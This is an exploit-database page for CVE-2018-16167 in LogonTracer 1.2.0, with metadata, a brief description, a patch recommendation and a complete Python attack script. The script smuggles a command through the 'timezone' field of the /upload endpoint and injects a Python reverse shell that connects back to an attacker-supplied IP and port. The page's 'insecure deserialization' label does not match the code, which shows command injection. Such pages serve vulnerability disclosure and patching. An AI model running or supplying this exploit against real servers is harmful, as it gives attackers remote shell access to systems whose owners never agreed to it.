LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)

vendor:

LogonTracer

by:

g0ldm45k

9.8

CVSS

CRITICAL

Remote Code Execution

502

CWE

Product Name: LogonTracer

Affected Version From: 1.2.0 and earlier

Affected Version To: 1.2.0

Patch Exists: YES

Related CWE: CVE-2018-16167

CPE: a:jpcert:logontracer:1.2.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Debian GNU/Linux 8 (jessie)

2021

LogonTracer 1.2.0 – Remote Code Execution (Unauthenticated)

LogonTracer 1.2.0 is vulnerable to remote code execution due to an insecure deserialization vulnerability. An attacker can send a malicious payload to the vulnerable endpoint, which will be executed on the server. This exploit uses a python reverse shell payload to connect back to the attacker's machine.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of LogonTracer.

Source

Exploit-DB raw data:

# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
# Date: 29/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.jpcert.or.jp/
# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
# Version: 1.2.0 and earlier
# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
# CVE : CVE-2018-16167

import requests
import argparse

parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
parser.add_argument('aip', type=str, help='Attacker ip')
parser.add_argument('aport', type=str, help='Attacker port')
parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')

args = parser.parse_args()

ATTACKER_IP = args.aip
ATTACKER_PORT = args.aport
PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"

VICTIM_URL = args.victimurl
VICTIM_ENDPOINT = "/upload"

DATA = {
    "logtype": "XML",
    "timezone": f"1;{PAYLOAD};",
}

print("[!] Sending request... If your terminal hangs, you might have a shell!")
requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
print("[*] Done. Did you get what you wanted?")